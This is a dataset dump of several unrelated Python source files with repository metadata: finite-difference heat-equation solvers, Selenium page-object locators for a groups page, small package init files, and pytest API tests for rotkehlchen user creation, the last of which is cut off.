c1279091163314684a769972cfd21267214565a1
|
[
"MIT"
] | null | null | null |
docsexp/__init__.py
|
AgentDS/DocsExp
|
c1279091163314684a769972cfd21267214565a1
|
[
"MIT"
] | null | null | null |
docsexp/__init__.py
|
AgentDS/DocsExp
|
c1279091163314684a769972cfd21267214565a1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 3/13/21 3:00 PM
# @Author : Siqi Liang
# @Contact : zszxlsq@gmail.com
# @File : __init__.py
# @Software: PyCharm
from docsexp.models import *
from docsexp.models import *
| 21.3
| 30
| 0.638498
| 30
| 213
| 4.4
| 0.833333
| 0.166667
| 0.257576
| 0.348485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052941
| 0.201878
| 213
| 9
| 31
| 23.666667
| 0.723529
| 0.661972
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8a6c9b601468e1320df481114c9645ba2316ddae
| 4,925
|
py
|
Python
|
code/ex2.py
|
CYZhao0709/The-Numerical-Method-Of-Differential-Equation
|
f916613298b92306044753a755da5e6843ef2fd9
|
[
"Apache-2.0"
] | 1
|
2018-01-01T05:01:13.000Z
|
2018-01-01T05:01:13.000Z
|
code/ex2.py
|
CYZhao0709/The-Numerical-Method-Of-Differential-Equation
|
f916613298b92306044753a755da5e6843ef2fd9
|
[
"Apache-2.0"
] | null | null | null |
code/ex2.py
|
CYZhao0709/The-Numerical-Method-Of-Differential-Equation
|
f916613298b92306044753a755da5e6843ef2fd9
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import math
"""
Sun. Dec 12th 2017, 11:36
@author: Yuzhao Chen
"""
def initTime(xs, problem=1):
if problem == 1:
return [2 * np.sin(2 * math.pi * x) for x in xs]
elif problem == 2:
return [np.sin(math.pi * x) + x * (1 - x) for x in xs]
else:
raise ValueError("Invalid Input.")
def initBorder(t, problem=1):
if problem == 1:
return 0
elif problem == 2:
return 0
else:
raise ValueError("Invalid Input.")
def precisionSolution(x,t,problem=1):
if problem==1:
return 2 * math.e**(- math.pi**2 / 4 * t) * np.sin(2 * math.pi * x)
elif problem == 2:
return math.e**(-t * math.pi**2) * np.sin(math.pi * x) + x * (1 - x)
else:
raise ValueError("Invalid Input.")
def forward(M, N, ex=1):
if ex==1:
a = 1 / 16
Fn = np.zeros((N, M - 1)) # 题目特殊,Fn都是常数
x1 = 0
x2 = 1
t1 = 0
t2 = 1
elif ex==2:
a = 1
Fn = np.ones((N, M - 1)) * 2 # 题目特殊,Fn都是常数
x1 = 0
x2 = 1
t1 = 0
t2 = 2
h = (x2 - x1) / M # 空间步长(横轴)
k = (t2 - t1) / N # 时间步长(纵轴)
print("空间步长:", h, end=',')
print("时间步长:", k)
r = a * k / (h**2) # 网比
print("r值(<1/2时稳定):", r)
xs = np.arange(x1, x2 + h, h) # 空间节点序列
ts = np.arange(t1, t2 + k, k) # 时间节点序列
U = np.zeros((N, M-1)) # 不同行不同时间,不同列不同空间
U[0][0] = U[0][-1] = 0
U[0] = initTime(xs[1:-1], problem=ex)
I = np.eye(M-1)
C = np.eye(M-1, k=1) + np.eye(M-1, k=-1)
for i in range(1, U.shape[0]):
U[i] = np.dot((1 - 2*r) * I + r * C, U[i-1]) + k * Fn[i-1]
UTrue = np.zeros((N, M-1))
UTrue[0] = U[0]
i = 0
for t in ts[1:-1]:
i += 1
j = -1
for x in xs[1:-1]:
j += 1
UTrue[i][j] = precisionSolution(x,t, problem=ex)
U_array = U.reshape(1, N * (M-1))
UTrue_array = UTrue.reshape(1, N * (M-1))
return U, UTrue, np.linalg.norm(U_array - UTrue_array)
def backward(M, N, ex=1):
if ex==1:
a = 1 / 16
Fn = np.zeros((N, M - 1)) # 题目特殊,Fn都是常数
x1 = 0
x2 = 1
t1 = 0
t2 = 1
elif ex==2:
a = 1
Fn = np.ones((N, M - 1)) * 2 # 题目特殊,Fn都是常数
x1 = 0
x2 = 1
t1 = 0
t2 = 2
h = (x2 - x1) / M # 空间步长(横轴)
k = (t2 - t1) / N # 时间步长(纵轴)
print("空间步长:", h, end=',')
print("时间步长:", k)
r = a * k / (h**2) # 网比
print("r值(绝对稳定):", r)
xs = np.arange(x1, x2 + h, h) # 空间节点序列
ts = np.arange(t1, t2 + k, k) # 时间节点序列
U = np.zeros((N, M-1)) # 不同行不同时间,不同列不同空间
U[0] = initTime(xs[1:-1], problem=ex)
I = np.eye(M-1)
C = np.eye(M-1, k=1) + np.eye(M-1, k=-1)
for i in range(1, U.shape[0]):
U[i] = np.linalg.solve((1 + 2*r)*I - r*C, U[i-1] + k*Fn[i])
UTrue = np.zeros((N, M-1))
UTrue[0] = U[0]
i = 0
for t in ts[1:-1]:
i += 1
j = -1
for x in xs[1:-1]:
j += 1
UTrue[i][j] = precisionSolution(x,t, problem=ex)
U_array = U.reshape(1, N * (M-1))
UTrue_array = UTrue.reshape(1, N * (M-1))
return U, UTrue, np.linalg.norm(U_array - UTrue_array)
def sixPoint(M, N, ex=1):
if ex==1:
a = 1 / 16
Fn = np.zeros((N, M - 1)) # 题目特殊,Fn都是常数
x1 = 0
x2 = 1
t1 = 0
t2 = 1
elif ex==2:
a = 1
Fn = np.ones((N, M - 1)) * 2 # 题目特殊,Fn都是常数
x1 = 0
x2 = 1
t1 = 0
t2 = 2
h = (x2 - x1) / M # 空间步长(横轴)
k = (t2 - t1) / N # 时间步长(纵轴)
print("空间步长:", h, end=',')
print("时间步长:", k)
r = a * k / (h**2) # 网比
print("r值(绝对稳定):", r)
xs = np.arange(x1, x2 + h, h) # 空间节点序列
ts = np.arange(t1, t2 + k, k) # 时间节点序列
U = np.zeros((N, M-1)) # 不同行不同时间,不同列不同空间
U[0] = initTime(xs[1:-1], problem=ex)
I = np.eye(M-1)
C = np.eye(M-1, k=1) + np.eye(M-1, k=-1)
for i in range(1, U.shape[0]):
U[i] = np.linalg.solve((1 + r)*I - 0.5*r*C, np.dot((1-r)*I+0.5*r*C,U[i-1]) + 0.5*k*(Fn[i]+Fn[i-1]))
UTrue = np.zeros((N, M-1))
UTrue[0] = U[0]
i = 0
for t in ts[1:-1]:
i += 1
j = -1
for x in xs[1:-1]:
j += 1
UTrue[i][j] = precisionSolution(x,t, problem=ex)
U_array = U.reshape(1, N * (M-1))
UTrue_array = UTrue.reshape(1, N * (M-1))
return U, UTrue, np.linalg.norm(U_array - UTrue_array)
# [4,4],[8,16],[8,8],[16,32],[32, 64]
for x, y in [[4, 100],[8,400],[4,200],[8, 800],[8, 200]]:
print("空间节点数量: ", x, end=',')
print("时间节点数量: ", y)
result = sixPoint(x,y, ex=2)
print("向量差L2范数(误差):",result[2])
print()
| 24.261084
| 108
| 0.425787
| 846
| 4,925
| 2.464539
| 0.124113
| 0.025899
| 0.025899
| 0.038849
| 0.830216
| 0.821103
| 0.759712
| 0.717026
| 0.702638
| 0.702638
| 0
| 0.089785
| 0.375838
| 4,925
| 202
| 109
| 24.381188
| 0.588484
| 0.057259
| 0
| 0.849673
| 0
| 0
| 0.030776
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.013072
| 0
| 0.111111
| 0.084967
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a7032a7aac9a23be7f7fa9092eae4f1dcc5adc2
| 13,888
|
py
|
Python
|
hubcheck/pageobjects/widgets/groups.py
|
codedsk/hubcheck
|
2ff506eb56ba00f035300862f8848e4168452a17
|
[
"MIT"
] | 1
|
2016-02-13T13:42:23.000Z
|
2016-02-13T13:42:23.000Z
|
hubcheck/pageobjects/widgets/groups.py
|
codedsk/hubcheck
|
2ff506eb56ba00f035300862f8848e4168452a17
|
[
"MIT"
] | null | null | null |
hubcheck/pageobjects/widgets/groups.py
|
codedsk/hubcheck
|
2ff506eb56ba00f035300862f8848e4168452a17
|
[
"MIT"
] | null | null | null |
from hubcheck.pageobjects.basepagewidget import BasePageWidget
from hubcheck.pageobjects.basepageelement import Button
from hubcheck.pageobjects.basepageelement import Link
from hubcheck.pageobjects.basepageelement import Text
class Groups1(BasePageWidget):
def __init__(self, owner, locatordict={}):
super(Groups1,self).__init__(owner,locatordict)
# load hub's classes
object_locators = self.load_class('Groups_Locators')
PopularList = self.load_class('PopularList')
PopularItem = self.load_class('PopularItem')
TextSearchBox = self.load_class('TextSearchBox')
# update this object's locator
self.locators.update(object_locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# setup page object's components
self.faq = Link(self,{'base':'faq'})
self.guidelines = Link(self,{'base':'guidelines'})
self.create = Link(self,{'base':'create'})
self.browse = Link(self,{'base':'browse'})
self.group_search = TextSearchBox(self,
{'base' : 'searchgroups',
'text' : 'searchi',
'submit' : 'searchb'})
self.popular_groups = PopularList(self,
{'base' : 'popularitem',
'item' : 'popularitem'},
PopularItem,
{'title' : 'pi_title',
'description' : 'pi_description',
'logo' : 'pi_logo'})
# update the component's locators with this objects overrides
self._updateLocators()
def goto_faq(self):
"""click the faq link"""
self.faq.click()
def goto_guidelines(self):
"""click the guidelines link"""
self.guidelines.click()
def goto_create_group(self):
"""click the create group link"""
self.create.click()
def goto_browse_list(self):
"""click the browse list of groups link"""
self.browse.click()
def search_groups(self,terms):
"""click the search groups link"""
return self.group_search.search_for(terms)
def get_popular_groups(self):
"""return the list of popular group names"""
groups = [group.value()['title'] \
for group in iter(self.popular_groups)]
return groups
def goto_popular_group(self,group_name):
"""click the group in the popular group list"""
group = self.popular_groups.get_item_by_property('title',group_name)
return group.goto_group()
def has_info_no_popular_groups(self):
"""check if the 'no popular groups' info block is displayed"""
return self.is_displayed(locator=self.locators['popularinfo'])
class Groups1_Locators_Base(object):
"""locators for Groups object"""
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#introduction .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.browse a",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
}
class Groups1_Locators_Base_2(object):
"""locators for Groups object"""
# new create locator
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.browse a",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
# 'popularitem' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups1_Locators_Base_3(object):
"""locators for Groups object"""
# new create locator
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#useroptions .group",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.browse a",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups1_Locators_Base_4(object):
"""locators for Groups object"""
# new create locator
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups1_Locators_Base_5(object):
"""
locators for Groups object
updated faq and guidelines locators for 1.1.2
"""
locators = {
'base' : "css=#content",
'faq' : "css=.group-intro-faqs",
'guidelines' : "css=.group-intro-guidelines",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups2(BasePageWidget):
"""
Groups page for 1.1.5, 1.2.0
"""
def __init__(self, owner, locatordict={}):
super(Groups2,self).__init__(owner,locatordict)
# load hub's classes
object_locators = self.load_class('Groups_Locators')
PopularList = self.load_class('PopularList')
PopularItem = self.load_class('PopularItem')
TextSearchBox = self.load_class('TextSearchBox')
# update this object's locator
self.locators.update(object_locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# setup page object's components
self.need_help = Link(self,{'base':'need_help'})
self.create = Link(self,{'base':'create'})
self.browse = Link(self,{'base':'browse'})
self.group_search = TextSearchBox(self,
{'base' : 'searchgroups',
'text' : 'searchi',
'submit' : 'searchb'})
self.popular_groups = PopularList(self,
{'base' : 'popularitem',
'item' : 'popularitem'},
PopularItem,
{'title' : 'pi_title',
'description' : 'pi_description',
'logo' : 'pi_logo'})
# update the component's locators with this objects overrides
self._updateLocators()
def goto_need_help(self):
"""click the guidelines link"""
self.need_help.click()
def goto_create_group(self):
"""click the create group link"""
self.create.click()
def goto_browse_list(self):
"""click the browse list of groups link"""
self.browse.click()
def search_groups(self,terms):
"""click the search groups link"""
return self.group_search.search_for(terms)
def get_popular_groups(self):
"""return the list of popular group names"""
groups = [group.value()['title'] \
for group in iter(self.popular_groups)]
return groups
def goto_popular_group(self,group_name):
"""click the group in the popular group list"""
group = self.popular_groups.get_item_by_property('title',group_name)
return group.goto_group()
def has_info_no_popular_groups(self):
"""check if the 'no popular groups' info block is displayed"""
return self.is_displayed(locator=self.locators['popularinfo'])
class Groups2_Locators_Base_1(object):
"""
locators for Groups object
removed faq and guidelines links
added need_help link
hub version 1.1.5
"""
locators = {
'base' : "css=#content",
'need_help' : "css=#introduction .aside .popup",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups2_Locators_Base_2(object):
"""
locators for Groups object
removed faq and guidelines links
added need_help link
locator change for popular section
hub version 1.2.0
"""
locators = {
'base' : "css=#content",
'need_help' : "css=#introduction .aside .popup",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(2) .info",
'popularitem' : "css=.group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups2_Locators_Base_3(object):
"""
locators for Groups object
updated need_help link locator
hub version 1.3.0
"""
locators = {
'base' : "css=#content",
'need_help' : "css=#introduction .popup",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(2) .info",
'popularitem' : "css=.group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
| 39.121127
| 128
| 0.537514
| 1,474
| 13,888
| 4.960651
| 0.082768
| 0.07645
| 0.027079
| 0.069201
| 0.926696
| 0.904677
| 0.878009
| 0.873769
| 0.867615
| 0.861187
| 0
| 0.00663
| 0.283194
| 13,888
| 354
| 129
| 39.231638
| 0.727875
| 0.112615
| 0
| 0.819905
| 0
| 0.099526
| 0.425569
| 0.17694
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080569
| false
| 0
| 0.018957
| 0
| 0.222749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8aa0564d9df88d404d1898d1a62c286f0c9c2e24
| 136
|
py
|
Python
|
profiling/context.py
|
przemub/pwndbg
|
6fd42dd5ab8ed08a88d5da458bc2a6fce4e2ef33
|
[
"MIT"
] | 4,461
|
2016-05-30T17:14:06.000Z
|
2022-03-31T11:19:49.000Z
|
profiling/context.py
|
przemub/pwndbg
|
6fd42dd5ab8ed08a88d5da458bc2a6fce4e2ef33
|
[
"MIT"
] | 789
|
2016-05-27T21:17:52.000Z
|
2022-03-31T12:37:06.000Z
|
profiling/context.py
|
przemub/pwndbg
|
6fd42dd5ab8ed08a88d5da458bc2a6fce4e2ef33
|
[
"MIT"
] | 844
|
2016-06-01T00:37:04.000Z
|
2022-03-31T10:39:30.000Z
|
import pwndbg.commands.context
def warmup():
pwndbg.commands.context.context()
def run():
pwndbg.commands.context.context()
| 13.6
| 37
| 0.720588
| 16
| 136
| 6.125
| 0.4375
| 0.428571
| 0.642857
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 136
| 9
| 38
| 15.111111
| 0.844828
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8accbdf012ae7eedf32fd077f4f2a2d7bfd2fec0
| 173
|
py
|
Python
|
emukit/examples/preferential_batch_bayesian_optimization/pbbo/__init__.py
|
ndalchau/emukit
|
eb6754ea016a7cd82b275bb4075676b5ed662634
|
[
"Apache-2.0"
] | 152
|
2020-10-24T13:12:57.000Z
|
2022-03-25T11:35:41.000Z
|
emukit/examples/preferential_batch_bayesian_optimization/pbbo/__init__.py
|
ndalchau/emukit
|
eb6754ea016a7cd82b275bb4075676b5ed662634
|
[
"Apache-2.0"
] | 87
|
2020-10-26T10:29:25.000Z
|
2022-03-04T11:17:59.000Z
|
emukit/examples/preferential_batch_bayesian_optimization/pbbo/__init__.py
|
ndalchau/emukit
|
eb6754ea016a7cd82b275bb4075676b5ed662634
|
[
"Apache-2.0"
] | 41
|
2020-10-24T11:59:21.000Z
|
2022-03-22T17:08:30.000Z
|
#from .bayesian_optimization import *
from .gp_models import *
from .util import *
from .acquisitions import *
from .inferences import *
from .bayesian_optimization import *
| 28.833333
| 37
| 0.791908
| 21
| 173
| 6.380952
| 0.428571
| 0.373134
| 0.358209
| 0.447761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132948
| 173
| 6
| 38
| 28.833333
| 0.893333
| 0.208092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8acd759a7d72d5d5bd2daebfe7d528e13ea740d0
| 196
|
py
|
Python
|
code/nets/net_stf7b.py
|
huangshunliang/EEG-Grasp
|
296b3819562091901a5e5bb3801e40f5da12a0b6
|
[
"BSD-2-Clause"
] | 16
|
2015-09-18T02:09:27.000Z
|
2020-04-05T06:23:21.000Z
|
code/nets/net_stf7b.py
|
huangshunliang/EEG-Grasp
|
296b3819562091901a5e5bb3801e40f5da12a0b6
|
[
"BSD-2-Clause"
] | 2
|
2015-09-24T19:00:19.000Z
|
2015-10-02T14:39:57.000Z
|
code/nets/net_stf7b.py
|
huangshunliang/EEG-Grasp
|
296b3819562091901a5e5bb3801e40f5da12a0b6
|
[
"BSD-2-Clause"
] | 14
|
2015-10-06T23:47:06.000Z
|
2020-05-14T08:04:00.000Z
|
from . import net_stf7
def create_net(train_source, test_source, **kwargs):
return net_stf7.create_net(train_source, test_source, filter0_width=9, filter1_num=64, filter2_num=128, **kwargs)
| 39.2
| 117
| 0.785714
| 31
| 196
| 4.612903
| 0.612903
| 0.097902
| 0.195804
| 0.27972
| 0.41958
| 0.41958
| 0
| 0
| 0
| 0
| 0
| 0.062857
| 0.107143
| 196
| 4
| 118
| 49
| 0.754286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
0a0cee4589bad81a869b636c6e03e8955035bb21
| 24,503
|
py
|
Python
|
rotkehlchen/tests/api/test_users.py
|
charlieknoll/rotki
|
fee58dba830f76ae91d116f05284e6afdfe23361
|
[
"BSD-3-Clause"
] | null | null | null |
rotkehlchen/tests/api/test_users.py
|
charlieknoll/rotki
|
fee58dba830f76ae91d116f05284e6afdfe23361
|
[
"BSD-3-Clause"
] | null | null | null |
rotkehlchen/tests/api/test_users.py
|
charlieknoll/rotki
|
fee58dba830f76ae91d116f05284e6afdfe23361
|
[
"BSD-3-Clause"
] | null | null | null |
from http import HTTPStatus
from pathlib import Path
from typing import Any, Dict
import pytest
import requests
from rotkehlchen.db.settings import ROTKEHLCHEN_DB_VERSION, DBSettings
from rotkehlchen.premium.premium import PremiumCredentials
from rotkehlchen.tests.utils.api import (
api_url_for,
assert_error_response,
assert_proper_response,
assert_simple_ok_response,
)
from rotkehlchen.tests.utils.premium import (
VALID_PREMIUM_KEY,
VALID_PREMIUM_SECRET,
create_patched_premium,
)
def check_proper_unlock_result(response_data: Dict[str, Any]) -> None:
assert response_data['result'] is not None
assert response_data['message'] == ''
result = response_data['result']
assert isinstance(result['exchanges'], list)
assert result['settings']['version'] == ROTKEHLCHEN_DB_VERSION
for setting in DBSettings._fields:
assert setting in result['settings']
def check_user_status(api_server) -> Dict[str, str]:
# Check users status
response = requests.get(
api_url_for(api_server, "usersresource"),
)
assert_proper_response(response)
data = response.json()
assert data['message'] == ''
return response.json()['result']
def test_loggedin_user_querying(rotkehlchen_api_server, username, data_dir):
"""Start with a logged in user and make sure we can query all users"""
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert json['result']['another_user'] == 'loggedout'
assert len(json['result']) == 2
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_not_loggedin_user_querying(rotkehlchen_api_server, username, data_dir):
"""Start without logged in user and make sure we can query all users"""
Path(data_dir / 'another_user').mkdir()
Path(data_dir / 'another_user' / 'rotkehlchen.db').touch()
Path(data_dir / username).mkdir()
Path(data_dir / username / 'rotkehlchen.db').touch()
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedout'
assert json['result']['another_user'] == 'loggedout'
assert len(json['result']) == 2
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation(rotkehlchen_api_server, data_dir):
"""Test that PUT at user endpoint can create a new user"""
# Create a user without any premium credentials
username = 'hania'
data = {
'name': username,
'password': '1234',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_proper_response(response)
check_proper_unlock_result(response.json())
# Query users and make sure the new user is logged in
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert len(json['result']) == 1
# Check that the directory was created
assert Path(data_dir / username / 'rotkehlchen.db').exists()
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation_with_premium_credentials(rotkehlchen_api_server, data_dir):
"""Test that PUT at user endpoint can create a new user"""
# Create a user with premium credentials
username = 'hania'
data = {
'name': username,
'password': '1234',
'premium_api_key': VALID_PREMIUM_KEY,
'premium_api_secret': VALID_PREMIUM_SECRET,
}
rotki = rotkehlchen_api_server.rest_api.rotkehlchen
patched_premium_at_start, _, patched_get = create_patched_premium(
PremiumCredentials(VALID_PREMIUM_KEY, VALID_PREMIUM_SECRET),
patch_get=True,
metadata_last_modify_ts=0,
metadata_data_hash=b'',
metadata_data_size=0,
)
with patched_premium_at_start:
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_proper_response(response)
check_proper_unlock_result(response.json())
# Query users and make sure the new user is logged in
response = requests.get(api_url_for(rotkehlchen_api_server, "usersresource"))
assert_proper_response(response)
json = response.json()
assert json['result'][username] == 'loggedin'
assert len(json['result']) == 1
# Check that the directory was created
assert Path(data_dir / username / 'rotkehlchen.db').exists()
# Check that the user has premium
assert rotki.premium is not None
assert rotki.premium.credentials.serialize_key() == VALID_PREMIUM_KEY
assert rotki.premium.credentials.serialize_secret() == VALID_PREMIUM_SECRET
with patched_get:
assert rotki.premium.is_active()
@pytest.mark.parametrize('start_with_logged_in_user', [False])
def test_user_creation_with_invalid_premium_credentials(rotkehlchen_api_server, data_dir):
"""
Test that invalid and unauthenticated premium credentials are handled at new user creation
"""
# Create a user with invalid credentials
username = 'hania'
data = {
'name': username,
'password': '1234',
'premium_api_key': 'foo',
'premium_api_secret': 'boo',
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
assert_error_response(
response=response,
contained_in_msg='Provided API/Key secret format is invalid',
)
# Check that the directory was NOT created
assert not Path(data_dir / username).exists(), 'The directory should not have been created'
# Create a new user with valid but not authenticable credentials
username = 'Anja'
data = {
'name': username,
'password': '1234',
'premium_api_key': VALID_PREMIUM_KEY,
'premium_api_secret': VALID_PREMIUM_SECRET,
}
response = requests.put(api_url_for(rotkehlchen_api_server, "usersresource"), json=data)
expected_msg = (
'Could not verify keys for the new account. Rotkehlchen API key was rejected by server'
)
assert_error_response(
response=response,
contained_in_msg=expected_msg,
status_code=HTTPStatus.CONFLICT,
)
# Check that the directory was NOT created
assert not Path(data_dir / username).exists(), 'The directory should not have been created'
# But check that a backup of the directory was made just in case
backups = list(Path(data_dir).glob('auto_backup_*'))
assert len(backups) == 1
assert 'auto_backup_Anja_' in str(backups[0]), 'An automatic backup should have been made'
